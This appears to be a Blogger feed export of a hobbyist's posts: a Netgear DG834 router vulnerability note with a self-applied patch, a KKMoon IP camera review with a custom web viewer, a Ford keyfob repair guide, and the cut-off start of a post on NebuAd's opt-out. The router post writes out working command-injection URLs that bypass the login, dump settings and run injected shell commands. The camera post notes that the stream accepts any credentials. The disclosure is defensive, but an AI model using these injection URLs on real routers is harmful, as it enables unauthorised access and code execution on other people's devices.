tag:blogger.com,1999:blog-59793185448728591162024-03-12T09:18:25.573+00:00Mel's NotesUnknownnoreply@blogger.comBlogger13125tag:blogger.com,1999:blog-5979318544872859116.post-39407446192634857652018-06-08T16:46:00.000+00:002018-06-08T20:01:21.257+00:00Netgear DG834 Router Series Password Bypass temporary patchThe DG834 series are vulnerable to password bypass and several shell command injection exploits. (I did report this to Netgear at least 10 years ago).<br />
<br />
If vulnerable, the following url should display the router's nvram settings without asking for a password (if you've logged in recently and not logged out, you won't be asked for a password anyway):-<br />
<div style="background-color: white; font-family: Arimo, Arial, FreeSans, Helvetica, sans-serif; font-size: 16px; margin-top: 1em; padding: 0px 0px 1px;">
<a href="http://routerlogin.net/ca/setup.cgi?todo=ping_test&next_file=../diagping.htm&c4_IPAddr=1%26/usr/sbin/nvram+show%3E%261" target="_blank">http://routerlogin.net/ca/setup.cgi?todo=ping_test&next_file=../diagping.htm&c4_IPAddr=1%26/usr/sbin/nvram+show>%261</a></div>
<br />
(Sky supplied DG834GT routers with the most recent sky firmware on them aren't vulnerable to the password bypass as they removed the ca directory when they redesigned their UI.)<br />
<br />
<br />
<br />
It seems some people still use these old routers, and router exploit malware is apparently on the rise, so here is a temporary patch to at least address the password bypass vulnerability (tested on a DG834N using the Vivaldi and Internet Explorer browsers, but may work on other models in the range).<br />
<br />
If it causes any issues, rebooting the router will get rid of it completely.<br />
<br />
<a href="http://routerlogin.net/ca/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;mkdir\x20/tmp/w2;cd\x20/tmp/w2;ln\x20-s\x20/www/??????*\x20.;ln\x20-s\x20/www/.*\x20.;killall\x20mini_httpd;mini_httpd\x20-d\x20/tmp/w2\x20-r\x20\x22MEL\x22\x20-c\x20\x27**.cgi\x27\x20-f\x20indexca.htm\x20-t\x20300\x26rm\x20$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=1%26(/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*}%26%26/bin/sh+/tmp/mel)+%3E/dev/null+2%3E/dev/null" target="_blank">http://routerlogin.net/ca/setup.cgi?PATH=/bin:/sbin:/usr/bin:/usr/sbin;mkdir\x20/tmp/w2;cd\x20/tmp/w2;ln\x20-s\x20/www/??????*\x20.;ln\x20-s\x20/www/.*\x20.;killall\x20mini_httpd;mini_httpd\x20-d\x20/tmp/w2\x20-r\x20\x22MEL\x22\x20-c\x20\x27**.cgi\x27\x20-f\x20indexca.htm\x20-t\x20300\x26rm\x20$0&todo=ping_test&next_file=diagping.htm&c4_IPAddr=1%26(/bin/echo%3E/tmp/mel+${QUERY_STRING%25%25%26to*}%26%26/bin/sh+/tmp/mel)+%3E/dev/null+2%3E/dev/null</a><br />
<br />
<br />
The router won't send any response, so wait a few seconds for the http server to restart, then log in to the router to make sure the UI is working, click on the logout link in the router's ui, then try the link at the top of the page to test if it is still vulnerable, it should respond with the pink 404 not found page.<br />
<br />
There are still a number of shell exploit vulnerabilities in setup.cgi, so always logout after you use the router's web interface. Also if you are using the default password, change it.<br />
<br />
The password issue exists because there is no .htpasswd file in the /www/ca directory, it should be a link to /etc/htpasswd. I think the ca directory is used by the easy setup software supplied with the router.<br />
<br />
Building new firmware with .httpasswd in /www.eng/ca/, /www.fre/ca/ etc should at least fix the password vulnerability.<br />
<br />
The URL above works by injecting and running the script I've embedded in the query string onto the router, which makes a copy of the current www directory (using links) in the router's /tmp directory, omitting all sub directories including "ca" and restarts its http server using the replacement directory.<br />
<br />
It would also be possible to modify this hack to survive a reboot.<br />
<br />
The second link won't work with some browsers, such as MS Edge, and it is possible that some affected models may not include busybox's support of the variable manipulation used in the fix.<br />
<br />
Use at your own risk and all that.Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-5979318544872859116.post-54754672632547446662016-01-04T23:36:00.001+00:002016-08-27T23:41:44.494+00:00KKMoon 805 IP Camera WebviewerI recently purchased a Kkmoon 805 720p IP Camera off ebay. It's software indicates that it is based on a <a href="http://processors.wiki.ti.com/index.php/DM365_Introductory_Information" target="_blank">Texas Instruments DM365</a> processor.<br />
<br />
It supports connection via P2P and RTSP. Log in uses basic authentication, it does not support HTTPS, so passwords are sent unencrypted and unfortunately its firmware doesn't appear to restrict the number of unsuccessful attempts to log in either.<br />
<br />
I've found the RTSP steam can be viewed without a password anyway.<br />
The following URLs worked for me using VLC media player:<br />
<br />
rtsp://user:pass@IPAddress:554/0 (720p stream, averages ~15fps, user and pass can be anything) <br />
rtsp://user:pass@IPAddress:554/1 (480p stream.. " " ")<br />
<br />
The following URLs also worked with VLC in Linux and android, but not in Windows:<br />
<br />
rtsp://IPAddress/camera-media/profile0 (720p)<br />
rtsp://IPAddress/camera-media/profile1 (480p)<br />
rtsp://IPAddress/camera-media/profile2 (opened both streams in the vlc plugin) <br />
<br />
To download a still from the camera:- <br />
<br />
http://IPAddress/snapshot/image0.jpg (320px x 240px). <br />
<br />
P2P allows the camera to be remotely accessible over the net with minimal configuration, it doesn't need port forwarding set up, or uPnP enabled, or DDNS. Unfortunately, if you don't want to allow P2P access, there's no option to disable P2P, other than blocking internet access for it in the router's firewall.<br />
<br />
The Android app I'm using is <a href="https://play.google.com/store/apps/details?id=object.weimaisizxone.client&hl=en" target="_blank"> P2PCam_HD</a> installed from Google Play, although I'm not sure if that is the official app for this camera, as I didn't install the one from the CD/website.<br />
<br />
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" rel="nofollow" src="https://www.youtube.com/embed/sSum70UOXEY" width="640"></iframe> <br />
<br />
Image quality is acceptable, but not fantastic, and deteriorates
badly in low light, until it flips out the IR-cut filter and switches to
black & white. Night vision lit by the IR emitters is fairly good.
Sound quality is poor, and I've yet to manage to access an audio stream
other than by the P2P apps. <br />
<br />
A nice feature is that it can record to a micro-SD card in 720p (or 480/320 if preferred).<br />
It
is supposed to be able to send an email when it detects motion, but I've
been unable to get email to work with any
email service I've tried, other than for sending the test email.<br />
<br />
<b>EDIT:</b> I was able to receive emails by running a local smtp server with the SSL option unticked, StartTLS doesn't seem to be implemented, and I'm guessing its SSL support is obsolete due to the SSL vulnerabilities. <br />
<br />
Another very annoying issue is occasionally when viewing the RTSP stream directly, with a programme like VLC or an ONVIF recorder, the camera will pan or tilt
on its own accord, and sooner or later the connection will drop with the camera firmware seeming to partially crash and reset itself, although it doesn't lose the time. So far this hasn't happened when monitoring the stream using its P2P apps, or recording to a micro SD card while not being monitored.<br />
<br />
The random pan/tilt issue seems to occur much less frequently when the camera has been up and running without a reboot for more than six days.<br />
<br />
The camera's positioning to presets doesn't seem to be reliably accurate, I suspect they might be getting corrupted along with the camera's track of its current position due to the crashes. <br />
<br />
There is nothing under the hole marked "Reset" in the bottom of the generic case. I removed the bottom from mine and found a pin hole under one of the sticky labels above a button on the rather diminutive circuit board for the various connectors. The pin hole is about ½" behind the camera mount screw and ¼" toward the side with the network port.<br />
<br />
The official software is hosted here:- <a href="http://down.54it.cn/">http://down.54it.cn</a><br />
<br />
The browser interface requires the installation of an
activex plug-in, requiring Internet Explorer, so I've created a
web page that also works in Firefox (32 bit version only) with the VLC plugin included with <a href="http://www.videolan.org/vlc/" target="_blank">VLC Media Player</a> to display the RTSP stream. IP address and port are stored as cookies. If you have one of these <a href="https://mjsage.github.io/Kkmoon805.html" target="_blank">I've hosted it here</a>, or you can use it directly from this page:-<br />
<br />
Unfortunately, Firefox will be dropping support of all NPAPI plugins, and the VLC NPAPI plugin is not one of the few permitted to run in the 64 bit version, so the 32 bit versions of both firefox and vlc is required. It
<br />
Edit: I've modified my javascript to get it working in Internet Explorer (both 32 and 64 bit).
<!--doctype html>
<html lang="en-GB">
<head-->
<title>KKMoon 805 IP Camera Webviewer</title>
<style media="screen" type="text/css">
.ptz {
//border-image: url('') 0px;
width: 40px;
height: 40px; /*background-image: url("http://192.168.1.5/Images/ptz_black.gif");*/ /*border:0px;*/;
padding: 0px;
display: inline-block;
}
</style>
<script>
<!--
/*\
|*|
|*| :: cookies.js ::
|*|
|*| A complete cookies reader/writer framework with full unicode support.
|*|
|*| Revision #1 - September 4, 2014
|*|
|*| https://developer.mozilla.org/en-US/docs/Web/API/document.cookie
|*| https://developer.mozilla.org/User:fusionchess
|*|
|*| This framework is released under the GNU Public License, version 3 or later.
|*| http://www.gnu.org/licenses/gpl-3.0-standalone.html
|*|
|*| Syntaxes:
|*|
|*| * docCookies.setItem(name, value[, end[, path[, domain[, secure]]]])
|*| * docCookies.getItem(name)
|*| * docCookies.removeItem(name[, path[, domain]])
|*| * docCookies.hasItem(name)
|*| * docCookies.keys()
|*|
\*/
var docCookies = {
getItem: function (sKey) {
if (!sKey) { return null; }
return decodeURIComponent(document.cookie.replace(new RegExp("(?:(?:^|.*;)\\s*" + encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=\\s*([^;]*).*$)|^.*$"), "$1")) || null;
},
setItem: function (sKey, sValue, vEnd, sPath, sDomain, bSecure) {
if (!sKey || /^(?:expires|max\-age|path|domain|secure)$/i.test(sKey)) { return false; }
var sExpires = "";
if (vEnd) {
switch (vEnd.constructor) {
case Number:
sExpires = vEnd === Infinity ? "; expires=Fri, 31 Dec 9999 23:59:59 GMT" : "; max-age=" + vEnd;
break;
case String:
sExpires = "; expires=" + vEnd;
break;
case Date:
sExpires = "; expires=" + vEnd.toUTCString();
break;
}
}
document.cookie = encodeURIComponent(sKey) + "=" + encodeURIComponent(sValue) + sExpires + (sDomain ? "; domain=" + sDomain : "") + (sPath ? "; path=" + sPath : "") + (bSecure ? "; secure" : "");
return true;
},
removeItem: function (sKey, sPath, sDomain) {
if (!this.hasItem(sKey)) { return false; }
document.cookie = encodeURIComponent(sKey) + "=; expires=Thu, 01 Jan 1970 00:00:00 GMT" + (sDomain ? "; domain=" + sDomain : "") + (sPath ? "; path=" + sPath : "");
return true;
},
hasItem: function (sKey) {
if (!sKey) { return false; }
return (new RegExp("(?:^|;\\s*)" + encodeURIComponent(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=")).test(document.cookie);
},
keys: function () {
var aKeys = document.cookie.replace(/((?:^|\s*;)[^\=]+)(?=;|$)|^\s*|\s*(?:\=[^;]*)?(?:\1|$)/g, "").split(/\s*(?:\=[^;]*)?;\s*/);
for (var nLen = aKeys.length, nIdx = 0; nIdx < nLen; nIdx++) { aKeys[nIdx] = decodeURIComponent(aKeys[nIdx]); }
return aKeys;
}
};
//!-->
</script>
<body>
<div style="background-color: #d9cfed; border: 1px black solid; border: 1px; color: black; height: 680px; padding: 10px; width: 1024px;">
<div id="vlc_container" style="display: inline-block; height: 540px; width: 846px;">
<!--object width="840" height="540" id="vlc_obj" classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921" codebase="http://downloads.videolan.org/pub/videolan/vlc/latest/win32/axvlc.cab"
style="left: 0px; top: 0px; width:840px; height:540px">
<param name="Src" value="">
<param name="ShowDisplay" value="yes">
<param name="AutoLoop" value="no">
<param name="AutoPlay" value="no">
<param name="Visible" value="-1">
<param name="BackColor" value="0">
-->
<embed height="540px" id="vlc" pluginspage="http://www.videolan.org" type="application/x-vlc-plugin" version="VideoLAN.VLCPlugin.2" width="846px"></embed>
<!--/object-->
<!--/embed -->
<br /><a href="javascript:;" onclick="play()">Play</a>
<a href="javascript:;" onclick="stop()">Stop</a>
<a href="javascript:;" onclick="myfullscreen()">Fullscreen</a>
</div>
<!-- PTZ Controls -->
<div style="display: inline-block; height: 512px; padding: 0px; width: 160px;">
<div style="display: inline-block; height: 120px; padding: 26px; width: 120px;">
<button class="pan ptz" disabled="disabled" id="panlup"> </button><!-- Avoid spaces and newlines between buttons as it is buggering up formatting.
--><button class="pan ptz" id="panup">Up</button><!--
--><button class="pan ptz" disabled="disabled" id="panrtup"> </button>
<button class="pan ptz" id="panleft">Left</button><!--
--><button class="pan ptz" id="panstop">Stop</button><!--
--><button class="pan ptz" id="panright">Right</button>
<button class="pan ptz" disabled="" id="pandlt"> </button><!--
--><button class="pan ptz" id="pandown">Down</button><!--
--><button class="pan ptz" disabled="" id="panrtd"> </button>
</div>
<img id="csrimg" src="" style="visibility: hidden;" />
<div style="display: inline-block; height: 20px; width: 120px;">
</div>
Presets
<div style="display: inline-block;">
<div id="presets" style="height: 160px; padding: 6px; width: 160px;">
</div>
<input checked="" id="goto" name="setorgoto" type="radio" value="Goto" />Goto
<input name="setorgoto" type="radio" value="Set" />Set</div>
<div style="display: inline-block; height: 20px; width: 100px;">
</div>
<!-- stream -->
<div style="display: inline-block;">
<input checked="" id="profile" name="profile" onchange="selectstream(0)" type="radio" value="0" />720p
<input name="profile" onchange="selectstream(1)" type="radio" value="1" />480
<input disabled="" id="lowres" name="profile" onchange="selectstream(2)" style="display: none;" type="radio" value="2" />
<br />
</div>
<div style="display: inline-block; height: 20px; width: 100px;">
</div>
<!-- IP Address !--><!----> <!---->
<div style="display: inline-block;">
Camera IP
<input id="camIP" onchange="setCamIP(this)" size="14" type="text" value="192.168.1.88" />:<input id="camPort" onchange="setCamPort(this)" size="2" type="text" value="554" />
</div>
<div style="display: inline-block; height: 20px; width: 120px;">
</div>
</div>
<br /><br />
<div>
IRCut <select id="irmode" name="irmode">
<option value="0">Daytime</option>
<option value="1">Nighttime</option>
<option value="2">Auto</option>
<option selected="" value="3">Algorythim</option>
</select> Colour <select id="colourmode" name="colourmode">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
</select> Sensitivity=<input id="irsens" size="3" type="text" value="7" /> Mirror=<input id="mirror" size="3" type="text" value="0" />
White Balance =<input id="whiteBal" size="3" type="text" value="1" /> Flicker=<input id="flicker" size="3" type="text" value="50" />
ExposureTime=<input id="expose" size="3" type="text" value="0" />
<button id="ircut" onclick="ircut()">Set</button></div>
<br />
User
<input id="user" onchange="setUser()" type="text" value="admin" /> Password<input id="pass" onchange="setUser()" type="password" value="anythingwilldo" />(anything will do)
<input id="alturl" onchange="selectstream(10)" type="checkbox" value="" /> Alt Url (linx only)
</div>
<script>
<!--
var vlcid;
/*if("ActiveXObject" in window){
vlcid = "vlc_obj";
}
else
*/
vlcid = "vlc";
var User="admin";
var Password="doesntmatter";
var IPAddress="192.168.1.188";
var Port = 554;
var Stream = "0";
var c = docCookies.getItem("IPAddress");
if(c !=null) {
IPAddress = c;
document.getElementById("camIP").value = c;
}
c = docCookies.getItem("Port");
if(c !=null) {
Port = c;
document.getElementById("camPort").value = c;
}
var myip= document.getElementById("camIP");
myip.value=IPAddress;
var user = docCookies.getItem("user");
if(user) document.getElementById("user").value=user;
user = docCookies.getItem("password");
if(user) document.getElementById("pass").value=user;
var reload=0;
var preset= document.getElementById("presets");
for(i=0;i<16;i++){
var button = document.createElement("button");
button.textContent=i;
button.className="ptz";
button.onclick=presets;
preset.appendChild(button)
}
/* if(vlc=document.getElementById(vlcid)) {
vlc.parentNode.removeChild(vlc);
vlc=null;
}
*/
//insertvlc();
setstream();
function setstream(){
var vlc = document.getElementById(vlcid);
//wait for plugin loaded...
if(typeof vlc.playlist == 'undefined') {
// alert(vlc.outerHTML);
// reload=1;
if("ActiveXObject" in window) setTimeout(setstream,3000);
else setTimeout(setstream, 1500);
return false;
}
//alert(vlc);
//window.alert(vlc);
// if(reload) location.reload();
// reload=0;
if(document.getElementById("profile").checked){
Stream=0;
}
else {
if(document.getElementById("lowres").checked && document.getElementById("alturl").checked) Stream =2;
else Stream=1;
}
vlc.style.display='none'; //try to get it to display in ie
//alert("stream="+Stream);
//var id = vlc.playlist.add("rtsp://" + User + ":" + Password + "@" + IPAddress + ":" + Port + "/" + Stream );
var streamurl = "rtsp://" + User + ":" + Password + "@" + IPAddress + ":" + Port + "/" + Stream;
if(document.getElementById("alturl").checked) streamurl = "rtsp://" + IPAddress + "/camera-media/profile" + Stream;
var id = vlc.playlist.add(streamurl);
setupptbuts();
vlc.playlist.playItem(id);
vlc.style.display='block';
}
function rld(){
location.reload();
}
//pluginspage="http://www.videolan.org" version="VideoLAN.VLCPlugin.2" type="application/x-vlc-plugin"
function insertvlc(){
var vlcdiv= document.getElementById("vlc_container");
var vlc = document.createElement("EMBED");
vlc.width=840;
vlc.height=520;
vlc.pluginspage="http://www.videolan.org";
vlc.version = "VideoLAN.VLCPlugin.2";
vlc.type = "application/x-vlc-plugin";
vlc.id="vlc";
vlcdiv.insertBefore(vlc, vlcdiv.firstChild);
}
function StopStream(){
vlc.playlist.stop();
}
function myfullscreen() {
vlc.video.toggleFullscreen();
}
function play() {
vlc.playlist.play();
}
function stop() {
vlc.playlist.stop();
}
//if mirror = 1 or 3 swap up and down
// if mirror = 2 swap left right
function ptz(e){
var action=0;
if (e.type =="mousedown"){
var mirror= document.getElementById("mirror").value;
switch(this.id) {
case "pandown":
action= (mirror==1 || mirror ==3)?2: 1;
break;
case "panup":
action= (mirror==1 || mirror ==3)?1: 2;
break;
case "panright":
action= (mirror==2 || mirror ==3)?4:3;
break;
case "panleft":
action= (mirror==2 || mirror ==3)?3:4;
break;
default:
action=0;
}
} else action =0;
// var rqst = new XMLHttpRequest();
// rqst.open("GET", LEFT,true,user,pass);
// rqst.onreadystatechange = reportStatus;
// rqst.send();
//document.getElementById("csrimg").src="";
document.getElementById("csrimg").src="http://" + IPAddress + "/goform/ptz.cgi?action=" +action +"&speed=25" + "&ppp=" + new Date().getTime();
}
function setupptbuts(){
var ptzbuts = document.getElementsByClassName('pan');
i=ptzbuts.length;
while(i--){
ptzbuts[i].addEventListener("mousedown", ptz);
ptzbuts[i].addEventListener("mouseup", ptz);
}
/*
set ircut = algorythim.
/goform/cmos.cgi?action=set&Mirror=0&WhiteBalance=1&Flicker=50&ExposureTime=0&IrCut=3&IrCutSensitive=7&Color=0
*/
}
function ircut(){
// GET /goform/cmos.cgi?action=set&Mirror=2&WhiteBalance=1&Flicker=50&ExposureTime=0&IrCut=1&IrCutSensitive=7&Color=0 HTTP/1.1
///goform/cmos.cgi?action=set&Mirror=0&WhiteBalance=1&Flicker=50&ExposureTime=0&IrCut=3&IrCutSensitive=7&Color=0
var irmode = document.getElementById("irmode").value;
var colour= document.getElementById("colourmode").value;
var irsens= document.getElementById("irsens").value;
var mirror= document.getElementById("mirror").value;
var whitebal = document.getElementById("whiteBal").value;
var flicker = document.getElementById("flicker").value;
var expose = document.getElementById("expose").value;
document.getElementById("csrimg").src="http://" + IPAddress + "/goform/cmos.cgi?action=set&Mirror=" + mirror + "&WhiteBalance=" + whitebal + "&Flicker=" + flicker + "&ExposureTime=" + expose + "&IrCut=" + irmode + "&IrCutSensitive=" + irsens +"&color=" + colour + "&ppp=" + new Date().getTime();
}
function presets(e) {
// alert
//GET /goform/ptz.cgi?action=15&AddrID=0&Speed=32&PresetName=3 HTTP/1.1
if(document.getElementById("goto").checked){
document.getElementById("csrimg").src="http://" + IPAddress + "/goform/ptz.cgi?action=15&AddrID=0&Speed=32&PresetName=" + this.textContent + "&ppp=" + new Date().getTime();
}
else
document.getElementById("csrimg").src="http://" + IPAddress + "/goform/ptz.cgi?action=17&AddrID=0&Speed=32&PresetName=" + this.textContent + "&ppp=" + new Date().getTime();
}
function setCamIP(e){
IPAddress= e.value;
//alert(IPAddress);
docCookies.setItem("IPAddress",IPAddress,Infinity);
selectstream(9);
}
function setCamPort(e){
Port = e.value;
//alert(IPAddress);
docCookies.setItem("Port",Port,Infinity);
selectstream(9);
}
function setUser(e){
User= document.getElementById("user").value;
Password = document.getElementById("pass").value;
docCookies.setItem("user",User,Infinity);
}
function selectstream(x){
/* if(!document.getElementById("alturl").checked){
document
}*/
document.getElementById("lowres").disabled = !document.getElementById("alturl").checked;
var vlc = document.getElementById(vlcid);
if(typeof vlc.playlist != 'undefined') {
vlc.playlist.items.clear();
vlc.playlist.stop();
setstream();
}
//
}
//!-->
</script>
<!--/body>
</html-->
</body>Unknownnoreply@blogger.com17tag:blogger.com,1999:blog-5979318544872859116.post-45783483227462323522010-11-16T20:19:00.026+00:002012-03-10T01:00:15.017+00:00Repairing a Ford Focus or Mondeo Keyfob RemoteA few months back my father was having trouble with the remote control central locking on his Ford Focus, a new battery in the keyfob didn't help, so I gave the contacts a quick clean with some isopropyl alcohol and all seemed well, until about a month later when it stopped working again. Initially I suspected the cheap 8 for a pound lithium battery I'd used, but realised it was probably a faulty switch after a further replacement only lasted a week, by which time the doors had also started to occasionally relock themselves.<br />
<br />
A replacement remote keyfob from Ford, is quite expensive, so he was keen for me to try and fix it.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL6gBHTAmgyKDCfkgI09rl5bkmJbGBBG5O9jolKqdNctiAfi3K0jFS-7eiLO1bRPg38XufqkHfP8uv6Px7e0_SO_KxoJ_7O1NbWn-8bUcvXLEX-6Ms85j-Wm-uzDbWPNLHdQfRGRsoNMs/s1600/P1000765_cr.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL6gBHTAmgyKDCfkgI09rl5bkmJbGBBG5O9jolKqdNctiAfi3K0jFS-7eiLO1bRPg38XufqkHfP8uv6Px7e0_SO_KxoJ_7O1NbWn-8bUcvXLEX-6Ms85j-Wm-uzDbWPNLHdQfRGRsoNMs/s200/P1000765_cr.jpg" width="200" /></a><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig7Xaefiv7INMogGYWqMSZZ9y4nyCRx7h3wRmdOOXb8vsnGTBvG2sYpimg7AVngbqqCQi64Et1cbOLmAvAsKc0iTw_q0jKW2keFtGumTDuVnS0CRKa7uyyR1m5fOjp7_SjjQitbuGw7x0/s1600/P1000772_cr.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig7Xaefiv7INMogGYWqMSZZ9y4nyCRx7h3wRmdOOXb8vsnGTBvG2sYpimg7AVngbqqCQi64Et1cbOLmAvAsKc0iTw_q0jKW2keFtGumTDuVnS0CRKa7uyyR1m5fOjp7_SjjQitbuGw7x0/s200/P1000772_cr.jpg" width="200" /></a>To get the key apart, use a small screwdriver inserted into the slot at the back to pry the remote section out of the key yoke. The two halves of the remote section then simply unclip.<br />
<br />
Should you decide to order a new remote from Ford, you'll find the part number on the remote section just below the slot. The RFID chip, which deactivates the immobiliser appears to be located in the half containing the battery, so if you don't have the two keys required to reprogram the immobiliser to accept the RFID in a new remote, swapping the battery compartment over would probably work.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; text-align: left;"><tbody>
<tr><td style="text-align: center;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSaLVBMjcQFENNuPIQJu599e2l6cvfauvYAlZWElkZubm0qGqgrg07iSu1PVJhIRazqrPyhFdWPRxFjmCD5t_C94tUfRpq54xlhvF2CKOrLxItDrOOv_pnd8CVewMg_yOKAReljAi8J9Q/s200/P1000773.JPG" style="margin-left: auto; margin-right: auto;" width="200" /></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br />
</td></tr>
</tbody></table>The plastic cover over the PCB is held in place by a couple of plastic pegs, which have had their ends melted to stop them pulling back through the holes. Rather than cut the melted ends off , I squeezed them around with a pair of tweezers reducing the diameter enough to pop through the hole.<br />
<br />
By now I'm wearing an anti-static strap, rather than risking zapping the electronics. They only cost about 2 quid from somewhere like dealextreme, but don't buy "wireless" ones, as they are a con, and don't work.<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCIaY1DP0_ZEmnShUEvK2vz08VkMPXnwwsgcwGPmhOGbHGA90JNTdseh7fl4I1vmNHeB3hyphenhyphenKJtJy9apOQUrPDKnY0t6cZs6ncSZcr638m1GlqyjOtoORatZybtBexKBLSWkB0nAdhEqW8/s1600/P1000775_cr.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCIaY1DP0_ZEmnShUEvK2vz08VkMPXnwwsgcwGPmhOGbHGA90JNTdseh7fl4I1vmNHeB3hyphenhyphenKJtJy9apOQUrPDKnY0t6cZs6ncSZcr638m1GlqyjOtoORatZybtBexKBLSWkB0nAdhEqW8/s200/P1000775_cr.jpg" width="200" /></a><br />
Gently pop the top peg out of the slot in the PCB to release it.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqMlLUlTwd3HCDlPvP21mjBtUbGnPZsDd5K_SR1ZyXElhUXH5egBwynD4ffRK8G0kfJGjKPZxqjfhRCTN_14MvZfbHaF33yaybpjzZNdIoe3dw2pwVWkSLt9FkVvuayAzRQhksh3aBGqI/s1600/P1000776.JPG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqMlLUlTwd3HCDlPvP21mjBtUbGnPZsDd5K_SR1ZyXElhUXH5egBwynD4ffRK8G0kfJGjKPZxqjfhRCTN_14MvZfbHaF33yaybpjzZNdIoe3dw2pwVWkSLt9FkVvuayAzRQhksh3aBGqI/s200/P1000776.JPG" width="200" /></a>With the PCB removed, you can see the three miniature switches.<br />
<br />
Testing my dad's ones with a meter revealed that the lock button had a partial short, enough to slowly drain the battery, but not normally quite enough to trigger the doors to lock<br />
<br />
The cause was corrosion inside the switch, the debris from which, was creating the short. It must have got moisture in, although my dad is certain that the key has never got wet. The key for his previous Focus went through the wash cycle on at least one occasion that I know of, but never developed a fault, the seal on this one clearly isn't so good.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWR2lPxmllMlLhlBjT6Zx-Rlnc5FHqD1w_Pn72IRJ7nUwxIDoKui3iNTaKBiPC9vVqfdainK6_flfai-jZcm2P2-A2t5IU_gs47YAgXxwxFWCTVgr_Vrvq3THZcdM2g2ekUm4_EL9rsY0/s1600/P1000780_cr.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWR2lPxmllMlLhlBjT6Zx-Rlnc5FHqD1w_Pn72IRJ7nUwxIDoKui3iNTaKBiPC9vVqfdainK6_flfai-jZcm2P2-A2t5IU_gs47YAgXxwxFWCTVgr_Vrvq3THZcdM2g2ekUm4_EL9rsY0/s200/P1000780_cr.jpg" width="180" /></a>The switches come apart quite easily, by using a jeweller's screwdriver to pop off their metal shells. They are a miniature leaf switch, one leaf acts as a contact, the other increases the force required to operate it. The one shown on the left was black, but cleaned up quite well<br />
<br />
As a temporary fix, I unclipped the metal shells, scraped off the worst of the corrosion from the contacts and the silver plated leaf on each switch with a jeweller's screwdriver, and cleaned them with isopropyl alcohol. This restored the remote to full working order, if you are lucky that might be all that is needed, but because of the very poor condition of the lock switch, I decided to source some replacements.<br />
<br />
The switches are 2 x 6 mm KSR subminiature tactile switches made by <a href="http://www.ck-components.com/ksr/tactile,10583,en.html">C&K</a>. From measuring the pressure required to operate the originals, I reckoned the 4.5N KSR251GLFS is the best match. You might even find you could swap the leaf switch and buttons over, rather than unsoldering the base, providing you can get the contacts in the switch base nice and clean.<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbzNiYINm7UWvt2wNiuwq3cT9BUyEnahkxw0GM5_9RLicwwVbG_0brdTsfhoP5klLKtR9vhyphenhyphendnu5UTZwwABfw7xhDEhA9Xsy1pEnHZ2HdhYWpk_Bt0zAJKFSnrlG_Y1xqq4U1_z89iV-Q/s1600/16112010050_cr.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="45" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbzNiYINm7UWvt2wNiuwq3cT9BUyEnahkxw0GM5_9RLicwwVbG_0brdTsfhoP5klLKtR9vhyphenhyphendnu5UTZwwABfw7xhDEhA9Xsy1pEnHZ2HdhYWpk_Bt0zAJKFSnrlG_Y1xqq4U1_z89iV-Q/s200/16112010050_cr.png" width="200" /></a>I'm afraid I don't have any pictures of soldering the replacement switches in, as I passed the job on to my brother; he's vastly better at soldering fiddly smt components than me. He tells me that he used a craft knife to separate the solder joints while heating it with his iron.<br />
<br />
When you come to soldering the new switches on the solder pads on the switch are gull-winded so should draw the solder in, the tricky bit is having a steady hand so as not to move them, or if you are clumsy like me, you might find it easier to solder them if you use a plastic spring clip to hold them in place.<br />
<br />
After reassembling and testing the key, you should fix the PCB and its cover firmly in place, as even a small amount of play can cause the battery contacts to bend and eventually lose contact with the pads on the PCB when pressing the buttons.. So I'd suggest gluing it in place, or as I have, to make it easy should I ever need to take it apart again, I stuck a small thin square of foam rubber (I used a strip of stick on rubber feet, but something like draft excluder might be thin enough) on the PCB cover so that it presses on the centre of the battery.<br />
<br />
The key is now working fine, and cost less than a tenner to fix, with a few spare switches left over, should it ever fail again.Unknownnoreply@blogger.com25tag:blogger.com,1999:blog-5979318544872859116.post-69485452002806351752008-05-16T12:01:00.019+00:002011-10-15T19:17:28.832+00:00Nebuad's opt-outI thought I'd have a quick look at one of Phorm's rivals, Nebuad.<br />
<br />
Apparently much like Phorm, Nebuad uses a cookie based opt-out. Opting out or back-in is achieved by requesting a URL, in response to which Nebuad's server sends your browser its opt-out, or opt-in cookies...<br />
<br />
